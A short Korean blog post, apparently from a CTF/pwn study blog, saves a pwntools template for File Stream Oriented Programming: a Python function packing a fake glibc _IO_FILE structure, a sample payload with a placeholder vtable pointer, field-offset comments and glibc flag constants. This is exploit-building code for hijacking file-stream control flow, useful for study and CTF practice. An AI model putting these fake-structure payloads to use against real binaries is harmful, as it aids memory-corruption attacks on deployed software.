매우 귀차니즘으로 인해.. FSOP 템플릿 구조를 업로드 해놓고 쓰려고 한다.
def FSOP_struct(flags=0, _IO_read_ptr=0, _IO_read_end=0, _IO_read_base=0,
_IO_write_base=0, _IO_write_ptr=0, _IO_write_end=0, _IO_buf_base=0, _IO_buf_end=0,
_IO_save_base=0, _IO_backup_base=0, _IO_save_end=0, _markers=0, _chain=0, _fileno=0,
_flags2=0, _old_offset=0, _cur_column=0, _vtable_offset=0, _shortbuf=0, lock=0,
_offset=0, _codecvt=0, _wide_data=0, _freeres_list=0, _freeres_buf=0,
__pad5=0, _mode=0, _unused2=b"", vtable=0, more_append=b""):
FSOP = p64(flags) + p64(_IO_read_ptr) + p64(_IO_read_end) + p64(_IO_read_base)
FSOP += p64(_IO_write_base) + p64(_IO_write_ptr) + p64(_IO_write_end)
FSOP += p64(_IO_buf_base) + p64(_IO_buf_end) + p64(_IO_save_base) + p64(_IO_backup_base) + p64(_IO_save_end)
FSOP += p64(_markers) + p64(_chain) + p32(_fileno) + p32(_flags2)
FSOP += p64(_old_offset) + p16(_cur_column) + p8(_vtable_offset) + p8(_shortbuf) + p32(0x0)
FSOP += p64(lock) + p64(_offset) + p64(_codecvt) + p64(_wide_data) + p64(_freeres_list) + p64(_freeres_buf)
FSOP += p64(__pad5) + p32(_mode)
if _unused2 == b"":
FSOP += b"\x00" * 0x14
else:
FSOP += _unused2[0x0:0x14].ljust(0x14, b"\x00")
FSOP += p64(vtable)
FSOP += more_append
return FSOP
FSOP = FSOP_struct(
)
payload = p64(0xfbad) #_flags
payload += p64(0) #_IO_read_ptr
payload += p64(0) #_IO_read_end
payload += p64(0) #_IO_read_base
payload += p64(0) #_IO_write_base
payload += p64(0) #_IO_write_ptr
payload += p64(0) #_IO_write_end
payload += p64(0) #_IO_buf_base
payload += p64(0) #_IO_buf_end
payload += p64(0) #_IO_save_base
payload += p64(0) #_IO_backup_base
payload += p64(0) #_IO_save_end
payload += p64(0) #struct _IO_marker *_markers
payload += p64(0) #struct _IO_FILE *_chain
payload += p64(1) #_fileno
payload += p64(0) #old offset
payload += p64(0) #cur column 2byte + vtableoffset 1byte + shortbuf 1byte
payload += p64(0) #lock
payload += p64(0) #offset
payload += p64(0) #condecvt
payload += p64(0) #widedata
payload += p64(0) #freeres list
payload += p64(0) #freeres buf
payload += p64(0) #pad5
payload += p64(0) #mode 4byte + unused 4byte
payload += p64(0) #unused2
payload += p64(0) #unused2
payload += p64(1111) #vtable!!!!
#flags(8) IO_read_ptr(8)
#IO_read_end(8) IO_read_base(8)
#IO_write_base(8) IO_write_ptr(8)
#IO_write_end(8) IO_buf_base(8)
#IO_buf_end(8) IO_save_base(8)
#IO_backup_base(8) IO_save_end(8)
#_markers(8) _chain(8)
#_fileno(4)+_flags2(4) _old_offset(8)
#잡다(8) lock(8)
#_offset(8) _codecvt(8)
#_wide_data(8) _freeres_list(8)
#_freeres_buf(8) __pad5(8)
#_mode(4)+unused2(4) unused2(8)
#unused2(8) vtable(8)
#define _IO_MAGIC 0xFBAD0000 /* Magic number */
#define _IO_MAGIC_MASK 0xFFFF0000
#define _IO_USER_BUF 0x0001 /* Don't deallocate buffer on close. */
#define _IO_UNBUFFERED 0x0002
#define _IO_NO_READS 0x0004 /* Reading not allowed. */
#define _IO_NO_WRITES 0x0008 /* Writing not allowed. */
#define _IO_EOF_SEEN 0x0010
#define _IO_ERR_SEEN 0x0020
#define _IO_DELETE_DONT_CLOSE 0x0040 /* Don't call close(_fileno) on close. */
#define _IO_LINKED 0x0080 /* In the list of all open files. */
#define _IO_IN_BACKUP 0x0100
#define _IO_LINE_BUF 0x0200
#define _IO_TIED_PUT_GET 0x0400 /* Put and get pointer move in unison. */
#define _IO_CURRENTLY_PUTTING 0x0800
#define _IO_IS_APPENDING 0x1000
#define _IO_IS_FILEBUF 0x2000
/* 0x4000 No longer used, reserved for compat. */
#define _IO_USER_LOCK 0x8000
'PWN > 개념' 카테고리의 다른 글
| FSOP - _IO_WDOALLOCATE 를 이용한 익스플로잇 (1) | 2025.08.29 |
|---|---|
| FSOP - vtables, bypass _IO_validate_vtable (1) | 2025.08.27 |
| Format String Bug - AAW시 스택 값 사용 (1) | 2025.08.22 |
| ROP에서 dup2를 이용한 리버스쉘 (0) | 2025.08.20 |
| Pwntools를 이용한 ROP 페이로드 작성 방법 (2) | 2025.07.30 |